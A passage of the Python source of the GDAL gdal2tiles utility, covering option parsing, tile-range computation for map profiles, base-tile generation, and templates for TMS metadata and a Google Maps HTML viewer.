help="Number of processes to use for tiling")
p.add_option('--tmpdir', dest="tmpdir",
help="Temporary files directory. Passed by R.")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Directory with input filename without extension in actual directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
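"""
Plain object holding the ReadRaster/WriteRaster window parameters for a single tile:
tile coordinates tx/ty/tz, the raster window rx/ry/rxsize/rysize, the write window
wx/wy/wxsize/wysize and the query size.
"""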
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp(prefix='', dir=options.tmpdir)
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big the query window should be for scaling down
# Reset later on according to the chosen resampling algorithm
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs EPSG:xyz (or similar) to provide the source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either run gdal2tiles with parameter -p 'raster' or use other GIS "
"software to georeference it, e.g. gdal_translate -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (the closest possible zoom level matching the resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (the closest possible zoom level matching the resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't scale up by nearest neighbour; instead change the querysize
# to the native resolution (and return a smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tile_size
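# At or above the native zoom the source has no extra resolution to offer,
# so read with a query window equal to the tile size.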
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
Note that no error is raised if the dataset does not contain anything inside this geo_query;
the caller is expected to check the returned sizes before calling ReadRaster()
"""
geotran = ds.GetGeoTransform()
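# Illustrative note: if the requested extent starts slightly left of the raster,
# rx is clamped to 0 below and wx is shifted by the corresponding amount, so the
# data still lands at the right position inside the tile's query window.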
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
